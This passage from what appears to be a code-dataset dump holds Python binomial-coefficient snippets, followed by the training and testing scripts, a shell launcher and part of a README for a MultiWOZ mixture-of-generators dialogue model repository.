new\n p[-1:] = new, 1\n return p[k]\n\n\n# Solution 8: generate numbers in 0...2^n, and count bits in them\n# c(n,k) = the count of numbers with k bits = 1\n# This algorithm is certainly slow with time complexity O(2^n) --\n# it is listed here just as a possible solution\ndef c(n, k):\n if n < 0 or k > n: return 0\n if k > n/2: k = n - k\n \n \"\"\"\n count=0\n for i in range(pow(2,n)):\n if bin(i).count('1') == k:\n count+=1\n return count\n \"\"\"\n # the line below just implements the above loop using functional programming\n return reduce(lambda c,i:c+1 if bin(i).count('1') == k else c, range(pow(2,n)), 0)\n\n# Solution 9: generate a binomial distribution\nfrom random import random\ndef toss(n, k):\n # print n, k\n count=0\n for i in range(n):\n if random() <= 0.5:\n count += 1\n # print count\n return 1 if count==k else 0\n\ndef c(n, k):\n samples = 1000000\n counts = 0\n for i in range(samples):\n counts += toss(n,k)\n # print counts\n return int(round(counts * pow(2,n) * 1.0 / samples))\n\n# test - print the PASCAL triangle with 20 rows\nfor i in range(20):\n for j in range(i+1):\n print c(i, j),\n print\n\n\n" } ]
2
Jiahuan-Pei/multiwoz-mdrg
https://github.com/Jiahuan-Pei/multiwoz-mdrg
bd9637d257bc41f1947eb6944e9d86caa05fc732
80307795b2776f0adfcae3285955eca2a82f0a26
229f781c72943b041f005142aa769932eaed3197
refs/heads/master
2021-06-25T13:49:28.700608
2021-03-24T01:52:31
2021-03-24T01:52:31
220,971,801
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.618311882019043, "alphanum_fraction": 0.6306151747703552, "avg_line_length": 42.5020751953125, "blob_id": "5e81357049f54287f6b842dfee75839e0f936c0e", "content_id": "1d9f44743256352d03aa7aafd880231da47d5e7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10485, "license_type": "no_license", "max_line_length": 181, "num_lines": 241, "path": "/test.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\nfrom __future__ import division, print_function, unicode_literals\n\nimport argparse\nimport json\nimport os\nimport shutil\nimport time\n\nimport numpy as np\nimport torch\n\nfrom utils import util, multiwoz_dataloader\nfrom models.evaluator import *\nfrom models.model import Model\nfrom utils.util import detected_device, pp_mkdir\nfrom multiwoz.Evaluators import *\n\n# pp added: print out env\nutil.get_env_info()\n\nparser = argparse.ArgumentParser(description='multiwoz1-bsl-te')\n# 1. Data & Dir\ndata_arg = parser.add_argument_group('Data')\ndata_arg.add_argument('--data_dir', type=str, default='data/multi-woz', help='the root directory of data')\ndata_arg.add_argument('--result_dir', type=str, default='results/bsl/')\ndata_arg.add_argument('--model_name', type=str, default='translate.ckpt')\n\n# 2. MISC\nmisc_arg = parser.add_argument_group('Misc')\nmisc_arg.add_argument('--dropout', type=float, default=0.0)\nmisc_arg.add_argument('--use_emb', type=str, default='False')\nmisc_arg.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)')\nmisc_arg.add_argument('--no_models', type=int, default=20, help='how many models to evaluate')\nmisc_arg.add_argument('--beam_width', type=int, default=10, help='Beam width used in beamsearch')\nmisc_arg.add_argument('--write_n_best', type=util.str2bool, nargs='?', const=True, default=False, help='Write n-best list (n=beam_width)')\n# 3. Here add new args\nnew_arg = parser.add_argument_group('New')\nnew_arg.add_argument('--intent_type', type=str, default=None, help='separate experts by intents: None, domain, sysact or domain_act') # pp added\nnew_arg.add_argument('--lambda_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--mu_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--gamma_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--debug', type=util.str2bool, nargs='?', const=True, default=False, help='if True use small data for debugging')\nargs = parser.parse_args()\nargs.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint('args.device={}'.format(args.device))\n\n# construct dirs\nargs.model_dir = '%s/model/' % args.result_dir\nargs.train_output = '%s/data/train_dials/' % args.result_dir\nargs.valid_output = '%s/data/valid_dials/' % args.result_dir\nargs.decode_output = '%s/data/test_dials/' % args.result_dir\nprint(args)\n\n# pp added: init seed\nutil.init_seed(args.seed)\n\ndef load_config(args):\n config = util.unicode_to_utf8(\n # json.load(open('%s.json' % args.model_path, 'rb')))\n json.load(open('{}{}.json'.format(args.model_dir, args.model_name), 'rb')))\n for key, value in args.__args.items():\n try:\n config[key] = value.value\n except:\n config[key] = value\n\n return config\n\n\ndef loadModelAndData(num):\n # Load dictionaries\n input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = util.loadDictionaries(mdir=args.data_dir)\n # pp added: load intents\n intent2index, index2intent = util.loadIntentDictionaries(intent_type=args.intent_type, intent_file='{}/intents.json'.format(args.data_dir)) if args.intent_type else (None, None)\n\n # Reload existing checkpoint\n model = Model(args, input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index, intent2index)\n model = model.to(detected_device)\n if args.load_param:\n model.loadModel(iter=num)\n\n # # Load validation file list:\n with open('{}/val_dials.json'.format(args.data_dir)) as outfile:\n val_dials = json.load(outfile)\n #\n # # Load test file list:\n with open('{}/test_dials.json'.format(args.data_dir)) as outfile:\n test_dials = json.load(outfile)\n\n return model, val_dials, test_dials, input_lang_word2index, output_lang_word2index, intent2index, index2intent\n\n\ndef decode(num=1, beam_search=False):\n\n model, val_dials, test_dials, input_lang_word2index, output_lang_word2index, intent2index, index2intent = loadModelAndData(num)\n\n delex_path = '%s/delex.json' % args.data_dir\n\n start_time = time.time()\n model.beam_search = beam_search\n\n step = 0 if not args.debug else 2 # small sample for debug\n\n # VALIDATION\n val_dials_gen = {}\n valid_loss = 0\n for name, val_file in list(val_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(val_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n\n valid_loss += loss_sentence\n val_dials_gen[name] = output_words\n\n print('Current VALID LOSS:', valid_loss)\n\n # Valid_Score = evaluateModel(val_dials_gen, val_dials, delex_path, mode='Valid')\n Valid_Score = evaluator.summarize_report(val_dials_gen, mode='Valid')\n # evaluteNLG(val_dials_gen, val_dials)\n\n # TESTING\n test_dials_gen = {}\n test_loss = 0\n for name, test_file in list(test_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(test_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n test_loss += loss_sentence\n test_dials_gen[name] = output_words\n\n test_loss /= len(test_dials)\n\n print('Current TEST LOSS:', test_loss)\n\n # Test_Score = evaluateModel(test_dials_gen, test_dials, delex_path, mode='Test')\n Test_Score = evaluator.summarize_report(test_dials_gen, mode='Test')\n # evaluteNLG(test_dials_gen, test_dials)\n\n print('TIME:', time.time() - start_time)\n return Valid_Score, val_dials_gen, np.exp(valid_loss), Test_Score, test_dials_gen, np.exp(test_loss)\n\n\ndef decodeWrapper(beam_search=False):\n # Load config file\n # with open(args.model_path + '.config') as f:\n with open('{}{}.config'.format(args.model_dir, args.model_name)) as f:\n add_args = json.load(f)\n for k, v in add_args.items():\n if k=='data_dir': # ignore this arg\n continue\n setattr(args, k, v)\n\n args.mode = 'test'\n args.load_param = True\n args.dropout = 0.0\n assert args.dropout == 0.0\n\n # Start going through models\n # args.original = args.model_path\n Best_Valid_Score = None\n Best_Test_Score = None\n Best_PPL = None\n Best_model_id = 0\n Best_val_dials_gen = {}\n Best_test_dials_gen = {}\n for ii in range(1, args.no_models + 1):\n print(30 * '-' + 'EVALUATING EPOCH %s' % ii)\n # args.model_path = args.model_path + '-' + str(ii)\n with torch.no_grad():\n Valid_Score, val_dials_gen, val_ppl, Test_Score, test_dials_gen, test_ppl = decode(ii, beam_search)\n if Best_Valid_Score is None or Best_Valid_Score[-2] < Valid_Score[-2]:\n Best_Valid_Score = Valid_Score\n Best_Test_Score = Test_Score\n Best_PPL = test_ppl\n Best_val_dials_gen = val_dials_gen\n Best_test_dials_gen = test_dials_gen\n Best_model_id = ii\n # try:\n # decode(ii, intent2index)\n # except:\n # print('cannot decode')\n\n # save best generated output to json\n print('Summary'+'~'*50)\n print('Best model: %s'%(Best_model_id))\n BLEU, MATCHES, SUCCESS, SCORE, P, R, F1 = Best_Test_Score\n mode = 'Test'\n print('%s PPL: %.2f' % (mode, Best_PPL))\n print('%s BLEU: %.4f' % (mode, BLEU))\n print('%s Matches: %2.2f%%' % (mode, MATCHES))\n print('%s Success: %2.2f%%' % (mode, SUCCESS))\n print('%s Score: %.4f' % (mode, SCORE))\n print('%s Precision: %.2f%%' % (mode, P))\n print('%s Recall: %.2f%%' % (mode, R))\n print('%s F1: %.2f%%' % (mode, F1))\n suffix = 'bm' if beam_search else 'gd'\n try:\n with open(args.valid_output + 'val_dials_gen_%s.json' % suffix, 'w') as outfile:\n json.dump(Best_val_dials_gen, outfile, indent=4)\n except:\n print('json.dump.err.valid')\n try:\n with open(args.decode_output + 'test_dials_gen_%s.json' % suffix, 'w') as outfile:\n json.dump(Best_test_dials_gen, outfile, indent=4)\n except:\n print('json.dump.err.test')\n\nif __name__ == '__main__':\n # create dir for generated outputs of valid and test set\n pp_mkdir(args.valid_output)\n pp_mkdir(args.decode_output)\n evaluator = MultiWozEvaluator('MultiWozEvaluator')\n print('\\n\\nGreedy Search'+'='*50)\n decodeWrapper(beam_search=False)\n print('\\n\\nBeam Search' + '=' * 50)\n decodeWrapper(beam_search=True)\n # evaluteNLGFile(gen_dials_fpath='results/bsl_20190510161309/data/test_dials/test_dials_gen.json',\n # ref_dialogues_fpath='data/test_dials.json')\n # evaluteNLGFiles(gen_dials_fpaths=['results/bsl_20190510161309/data/test_dials/test_dials_gen.json',\n # 'results/moe1_20190510165545/data/test_dials/test_dials_gen.json'],\n # ref_dialogues_fpath='data/test_dials.json')\n # from nlgeval import compute_metrics\n # metrics_dict = compute_metrics(hypothesis='/Users/pp/Code/nlg-eval/examples/hyp.txt',\n # references=['/Users/pp/Code/nlg-eval/examples/ref1.txt'])\n\n" }, { "alpha_fraction": 0.6122468709945679, "alphanum_fraction": 0.6233891844749451, "avg_line_length": 52.4766845703125, "blob_id": "acfc91d5aa5c20c66b1f89821b471ef159604f49", "content_id": "2d8c5a91773800467efa84e42c349b2cf1ee893c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20642, "license_type": "no_license", "max_line_length": 222, "num_lines": 386, "path": "/train.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "# coding=utf-8\nfrom __future__ import division, print_function, unicode_literals\n\nimport argparse\nimport json\nimport random\nimport datetime\nfrom io import open\nimport os\nimport shutil\n\nimport numpy as np\nimport torch\nfrom torch.optim import Adam\nimport torch.nn as nn\n\nfrom utils import util, multiwoz_dataloader\nfrom models.model import Model\nfrom utils.util import detected_device, PAD_token, pp_mkdir\nfrom multiwoz.Evaluators import *\n# from tqdm import tqdm\n# SOS_token = 0\n# EOS_token = 1\n# UNK_token = 2\n# PAD_token = 3\n\n# pp added: print out env\nutil.get_env_info()\n\nall_start_time = datetime.datetime.now()\nprint('Start time={}'.format(all_start_time.strftime(\"%Y-%m-%d %H:%M:%S\")))\n\nparser = argparse.ArgumentParser(description='multiwoz1-bsl-tr')\n# Group args\n# 1. Data & Dirs\ndata_arg = parser.add_argument_group(title='Data')\ndata_arg.add_argument('--data_dir', type=str, default='data/multi-woz', help='the root directory of data')\ndata_arg.add_argument('--log_dir', type=str, default='logs')\ndata_arg.add_argument('--result_dir', type=str, default='results/bsl')\ndata_arg.add_argument('--pre_model_dir', type=str, default='results/moe4_gru-27062/model')\ndata_arg.add_argument('--model_name', type=str, default='translate.ckpt')\n\n# 2.Network\nnet_arg = parser.add_argument_group(title='Network')\nnet_arg.add_argument('--cell_type', type=str, default='lstm')\nnet_arg.add_argument('--attention_type', type=str, default='bahdanau')\nnet_arg.add_argument('--depth', type=int, default=1, help='depth of rnn')\nnet_arg.add_argument('--emb_size', type=int, default=50)\nnet_arg.add_argument('--hid_size_enc', type=int, default=150)\nnet_arg.add_argument('--hid_size_dec', type=int, default=150)\nnet_arg.add_argument('--hid_size_pol', type=int, default=150)\nnet_arg.add_argument('--max_len', type=int, default=50)\nnet_arg.add_argument('--vocab_size', type=int, default=400, metavar='V')\nnet_arg.add_argument('--use_attn', type=util.str2bool, nargs='?', const=True, default=True) # F\nnet_arg.add_argument('--use_emb', type=util.str2bool, nargs='?', const=True, default=False)\n\n# 3.Train\ntrain_arg = parser.add_argument_group(title='Train')\ntrain_arg.add_argument('--mode', type=str, default='train', help='training or testing: test, train, RL')\ntrain_arg.add_argument('--optim', type=str, default='adam')\ntrain_arg.add_argument('--max_epochs', type=int, default=20) # 15\ntrain_arg.add_argument('--lr_rate', type=float, default=0.005)\ntrain_arg.add_argument('--lr_decay', type=float, default=0.0)\ntrain_arg.add_argument('--l2_norm', type=float, default=0.00001)\ntrain_arg.add_argument('--clip', type=float, default=5.0, help='clip the gradient by norm')\ntrain_arg.add_argument('--teacher_ratio', type=float, default=1.0, help='probability of using targets for learning')\ntrain_arg.add_argument('--dropout', type=float, default=0.0)\ntrain_arg.add_argument('--early_stop_count', type=int, default=2)\ntrain_arg.add_argument('--epoch_load', type=int, default=0)\ntrain_arg.add_argument('--load_param', type=util.str2bool, nargs='?', const=True, default=False)\ntrain_arg.add_argument('--start_epoch', type=int, default=0) # when to use SentMoE\n\n# 4. MISC\nmisc_arg = parser.add_argument_group('MISC')\nmisc_arg.add_argument('--seed', type=int, default=0, metavar='S', help='random seed (default: 1)')\nmisc_arg.add_argument('--batch_size', type=int, default=64, metavar='N', help='input batch size for training (default: 64)')\nmisc_arg.add_argument('--db_size', type=int, default=30)\nmisc_arg.add_argument('--bs_size', type=int, default=94)\nmisc_arg.add_argument('--beam_width', type=int, default=10, help='Beam width used in beamsearch')\n#\n# 5. Here add new args\nnew_arg = parser.add_argument_group('New')\nnew_arg.add_argument('--intent_type', type=str, default=None, help='separate experts by intents: None, domain, sysact or domain_act') # pp added\n# different implementation of moe\n# 1. only weight loss & hyper weights\n# --use_moe_loss=True --learn_loss_weight=False --use_moe_model=False\n# 2. only weight loss & learn weights\n# --use_moe_loss=True --learn_loss_weight=True --use_moe_model=False\n# 3. only split models\n# --use_moe_loss=False --learn_loss_weight=False --use_moe_model=True\n# 4. both & hyper weights\n# --use_moe_loss=True --learn_loss_weight=False --use_moe_model=True\n# 5. both & learn weights\n# --use_moe_loss=True --learn_loss_weight=True --use_moe_model=True\nnew_arg.add_argument('--use_moe_loss', type=util.str2bool, nargs='?', const=True, default=False, help='inner models weighting loss')\nnew_arg.add_argument('--learn_loss_weight', type=util.str2bool, nargs='?', const=True, default=False, help='learn weight of moe loss')\nnew_arg.add_argument('--use_moe_model', type=util.str2bool, nargs='?', const=True, default=False, help='inner models structure partition')\nnew_arg.add_argument('--debug', type=util.str2bool, nargs='?', const=True, default=False, help='if True use small data for debugging')\nnew_arg.add_argument('--train_valid', type=util.str2bool, nargs='?', const=True, default=False, help='if True add valid data for training')\n\nnew_arg.add_argument('--train_ratio', type=float, default=1.0) # use xx percent of training data\nnew_arg.add_argument('--lambda_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--mu_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--gamma_expert', type=float, default=0.5) # use xx percent of training data\nnew_arg.add_argument('--SentMoE', type=util.str2bool, nargs='?', const=True, default=False, help='if True use sentence info')\nnew_arg.add_argument('--if_detach', type=util.str2bool, nargs='?', const=True, default=False) # if detach expert parts\nnew_arg.add_argument('--rp_share_rnn', type=util.str2bool, nargs='?', const=True, default=True) # if detach expert parts\nnew_arg.add_argument('--future_info', type=str, default='proba') # use hidd or proba\n\nargs = parser.parse_args()\nargs.device = detected_device.type\nprint('args.device={}'.format(args.device))\nprint('args.intent_type={}'.format(args.intent_type))\n\n# construct dirs\nargs.model_dir = '%s/model' % args.result_dir\nargs.train_output = '%s/data/train_dials' % args.result_dir\nargs.valid_output = '%s/data/valid_dials' % args.result_dir\nargs.decode_output = '%s/data/test_dials' % args.result_dir\nargs.delex_path = '%s/delex.json' % args.data_dir\nprint(args)\n\n# pp added: init seed\nutil.init_seed(args.seed)\n\ndef trainOne(print_loss_total,print_act_total, print_grad_total, input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor=None, name=None):\n\n loss, loss_acts, grad = model.model_train(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor, mask_tensor, name)\n # pp added: experts' loss\n # print('@'*20, '\\n', target_tensor)\n '''\n if args.use_moe_loss and False: # data separate by intents\n gen_loss_list = []\n if mask_tensor is not None: # data separate by intents\n # print(mask_tensor)\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n target_tensor_i = target_tensor.clone()\n target_tensor_i = target_tensor_i.masked_fill_(mask, value=PAD_token)\n # print(mask)\n # print(target_tensor_i)\n # print('*'*50)\n loss_i, loss_acts_i, grad_i = model.model_train(input_tensor, input_lengths, target_tensor_i, target_lengths, db_tensor, bs_tensor, mask_tensor, name)\n gen_loss_list.append(loss_i)\n # print('loss', loss, '; mean_experts_loss', torch.mean(torch.tensor(gen_loss_list)), '\\ngen_loss_list', ['%.4f' % s if s!=0 else '0' for s in gen_loss_list])\n\n # mu_expert = 0.5\n mu_expert = args.mu_expert\n loss = (1 - mu_expert) * loss + mu_expert * torch.mean(torch.tensor(gen_loss_list))\n '''\n\n #print(loss, loss_acts)\n print_loss_total += loss\n print_act_total += loss_acts\n print_grad_total += grad\n\n model.global_step += 1\n model.sup_loss = torch.zeros(1)\n\n return print_loss_total, print_act_total, print_grad_total\n\n\ndef trainIters(model, intent2index, n_epochs=10, args=args):\n prev_min_loss, early_stop_count = 1 << 30, args.early_stop_count\n start = datetime.datetime.now()\n # Valid_Scores, Test_Scores = [], []\n Scores = []\n val_dials_gens, test_dials_gens = [], []\n origin = args.SentMoE # original flag\n for epoch in range(1, n_epochs + 1):\n # pp added\n if origin:\n if epoch > args.start_epoch:\n args.SentMoE = True\n print('BeginSentMOE', '-'*50)\n else:\n args.SentMoE = False\n print('%s\\nEpoch=%s (%s %%)' % ('~'*50, epoch, epoch / n_epochs * 100))\n print_loss_total = 0; print_grad_total = 0; print_act_total = 0 # Reset every print_every\n start_time = datetime.datetime.now()\n # watch out where do you put it\n model.optimizer = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.parameters()), weight_decay=args.l2_norm)\n model.optimizer_policy = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.policy.parameters()), weight_decay=args.l2_norm)\n # Training\n model.train()\n step = 0\n for data in train_loader: # each element of data tuple has [batch_size] samples\n step += 1\n model.optimizer.zero_grad()\n model.optimizer_policy.zero_grad()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n print_loss_total, print_act_total, print_grad_total = trainOne(print_loss_total, print_act_total, print_grad_total, input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor)\n if step > 1 and args.debug:\n break # for debug\n if args.train_ratio!=1.0 and step > args.train_ratio * len(train_loader):\n break # only train of\n\n train_len = len(train_loader) # 886 data # len(train_loader.dataset.datasets) # 8423 dialogues\n print_loss_avg = print_loss_total / train_len\n print_act_total_avg = print_act_total / train_len\n print_grad_avg = print_grad_total / train_len\n print('Train Time:%.4f' % (datetime.datetime.now() - start_time).seconds)\n print('Train Loss: %.6f\\nTrain Grad: %.6f' % (print_loss_avg, print_grad_avg))\n\n if not args.debug:\n step = 0\n\n # VALIDATION\n if args.train_valid: # if add valid data for training\n model.train()\n valid_loss = 0\n for name, val_file in list(val_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(val_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: mask_tensor\n proba = proba.view(-1, model.vocab_size) # flatten all predictions\n loss = model.gen_criterion(proba, target_tensor.view(-1))\n valid_loss += loss.item()\n valid_len = len(val_dials) # 1000\n valid_loss /= valid_len\n # pp added: evaluate valid\n print('Train Valid Loss: %.6f' % valid_loss)\n\n # pp added\n with torch.no_grad():\n model.eval()\n val_dials_gen = {}\n valid_loss = 0\n for name, val_file in list(val_dials.items())[-step:]: # for py3\n loader = multiwoz_dataloader.get_loader_by_dialogue(val_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: mask_tensor\n proba = proba.view(-1, model.vocab_size) # flatten all predictions\n loss = model.gen_criterion(proba, target_tensor.view(-1))\n valid_loss += loss.item()\n # pp added: evaluation - Plan A\n # models.eval()\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n # models.train()\n val_dials_gen[name] = output_words\n valid_len = len(val_dials) # 1000\n valid_loss /= valid_len\n\n # pp added: evaluate valid\n print('Valid Loss: %.6f' % valid_loss)\n # BLEU, MATCHES, SUCCESS, SCORE, P, R, F1\n Valid_Score = evaluator.summarize_report(val_dials_gen, mode='Valid')\n # Valid_Score = evaluateModel(val_dials_gen, val_dials, delex_path, mode='Valid')\n val_dials_gens.append(val_dials_gen) # save generated output for each epoch\n # Testing\n # pp added\n model.eval()\n test_dials_gen ={}\n test_loss = 0\n for name, test_file in list(test_dials.items())[-step:]:\n loader = multiwoz_dataloader.get_loader_by_dialogue(test_file, name,\n input_lang_word2index, output_lang_word2index,\n args.intent_type, intent2index)\n data = iter(loader).next()\n # Transfer to GPU\n if torch.cuda.is_available():\n data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor = data\n proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: mask_tensor\n proba = proba.view(-1, model.vocab_size) # flatten all predictions\n\n loss = model.gen_criterion(proba, target_tensor.view(-1))\n test_loss += loss.item()\n\n output_words, loss_sentence = model.predict(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor)\n\n test_dials_gen[name] = output_words\n # pp added: evaluate test\n test_len = len(test_dials) # 1000\n test_loss /= test_len\n # pp added: evaluate valid\n print('Test Loss: %.6f' % valid_loss)\n Test_Score = evaluator.summarize_report(test_dials_gen, mode='Test')\n # Test_Score = evaluateModel(test_dials_gen, test_dials, delex_path, mode='Test')\n test_dials_gens.append(test_dials_gen)\n\n try:\n with open(args.decode_output + '/test_dials_gen_%s.json' % epoch, 'w') as outfile:\n json.dump(test_dials_gen, outfile, indent=4)\n except:\n print('json.dump.err.test')\n\n model.train()\n # pp added: evaluation - Plan B\n # print(50 * '=' + 'Evaluating start...')\n # # eval_with_train(models)\n # eval_with_train3(models, val_dials, mode='valid')\n # eval_with_train3(models, test_dials, mode='test')\n # print(50 * '=' + 'Evaluating end...')\n\n model.saveModel(epoch)\n # BLEU, MATCHES, SUCCESS, SCORE, TOTAL\n Scores.append(tuple([epoch]) + Valid_Score + tuple(['%.2f'%np.exp(valid_loss)]) + Test_Score + tuple(['%.2f'%np.exp(test_loss)])) # combine the tuples; 11 elements\n\n # summary of evaluation metrics\n import pandas as pd\n # BLEU, MATCHES, SUCCESS, SCORE, P, R, F1\n fields = ['Epoch',\n 'Valid BLEU', 'Valid Matches', 'Valid Success', 'Valid Score', 'Valid P', 'Valid R', 'Valid F1', 'Valid PPL',\n 'Test BLEU', 'Test Matches', 'Test Success', 'Test Score', 'Test P', 'Test R', 'Test F1', 'Test PPL']\n df = pd.DataFrame(Scores, columns=fields)\n sdf = df.sort_values(by=['Valid Score'], ascending=False)\n print('Top3:', '=' * 60)\n print(sdf.head(3).transpose())\n print('Best:', '=' * 60) # selected by valid score\n best_df = sdf.head(1)[['Epoch', 'Test PPL', 'Test BLEU', 'Test Matches', 'Test Success', 'Test Score', 'Test P', 'Test R', 'Test F1']]\n print(best_df.transpose())\n # save best prediction to json, evaluated on valid set\n best_model_id = np.int(best_df['Epoch']) - 1 # epoch start with 1\n try:\n with open(args.valid_output + '/val_dials_gen.json', 'w') as outfile:\n json.dump(val_dials_gens[best_model_id], outfile, indent=4)\n except:\n print('json.dump.err.valid')\n try:\n with open(args.decode_output + '/test_dials_gen.json', 'w') as outfile:\n json.dump(test_dials_gens[best_model_id], outfile, indent=4)\n except:\n print('json.dump.err.test')\n return best_df\n\n\nif __name__ == '__main__':\n input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = util.loadDictionaries(mdir=args.data_dir)\n\n # pp added: load intents\n intent2index, index2intent = util.loadIntentDictionaries(intent_type=args.intent_type, intent_file='{}/intents.json'.format(args.data_dir)) if args.intent_type else (None, None)\n\n # pp added: data loaders\n train_loader = multiwoz_dataloader.get_loader('{}/train_dials.json'.format(args.data_dir), input_lang_word2index, output_lang_word2index, args.intent_type, intent2index, batch_size=args.batch_size)\n # valid_loader_list = multiwoz_dataloader.get_loader_by_full_dialogue('{}/val_dials.json'.format(args.data_dir), input_lang_word2index, output_lang_word2index, args.intent_type, intent2index)\n # test_loader_list = multiwoz_dataloader.get_loader_by_full_dialogue('{}/test_dials.json'.format(args.data_dir), input_lang_word2index, output_lang_word2index, args.intent_type, intent2index)\n # Load validation file list:\n with open('{}/val_dials.json'.format(args.data_dir)) as outfile:\n val_dials = json.load(outfile)\n # Load test file list:\n with open('{}/test_dials.json'.format(args.data_dir)) as outfile:\n test_dials = json.load(outfile)\n\n # delex_path = '%s/delex.json' % args.data_dir\n\n # create dir for generated outputs of valid and test set\n pp_mkdir(args.valid_output)\n pp_mkdir(args.decode_output)\n\n model = Model(args, input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index, intent2index, index2intent)\n # models = nn.DataParallel(models, device_ids=[0,1]) # latter for parallel\n model = model.to(detected_device)\n\n if args.load_param:\n model.loadModel(args.epoch_load)\n\n\n evaluator = MultiWozEvaluator('MultiWozEvaluator', delex_path=args.delex_path)\n\n # Test_Score = evaluator.summarize_report(test_dials_gen, mode='Test')\n\n trainIters(model, intent2index, n_epochs=args.max_epochs, args=args)\n\n all_end_time = datetime.datetime.now()\n print('End time={}'.format(all_end_time.strftime(\"%Y-%m-%d %H:%M:%S\")))\n print('Use time={} seconds'.format((all_end_time-all_start_time).seconds))\n" }, { "alpha_fraction": 0.682692289352417, "alphanum_fraction": 0.6971153616905212, "avg_line_length": 40.400001525878906, "blob_id": "3c6e38330fa604ac933733aa2e3aedbc6223651d", "content_id": "12ba35eb5fafe6111dcbfe8a3361c46def86de83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 114, "num_lines": 5, "path": "/train.sh", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nmkdir -p logs\nsource activate multiwoz\nTIMESTAMP=`date \"+%Y%m%d%H%M%S\"`\npython2 -u train.py --data_dir='../multiwoz1-moe/data' --debug=True --max_epochs=2 >> logs/laptop-$TIMESTAMP.train\n\n" }, { "alpha_fraction": 0.6272370219230652, "alphanum_fraction": 0.6499345302581787, "avg_line_length": 26.2738094329834, "blob_id": "bfc0702c4f0c276369549e531d979b6cb25bccb2", "content_id": "55b760ecf5ade3f94b9f2f46175022bf334d4192", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2291, "license_type": "no_license", "max_line_length": 225, "num_lines": 84, "path": "/README.md", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "# RPMOG\n\nTo facilitate reproducibility, we release the source code for paper \"[Retrospective and Prospective Mixture-of-Generators for Task-oriented Dialogue Response Generation](https://ecai2020.eu/papers/92_paper.pdf)\" on ECAI 2020.\n\nPlease contact me by email ([email protected]) if any questions and **cite** our paper if you use any resources and/or codes in this repository. \n\n# Requirements\nPython 3 with pip\n\n# Quick 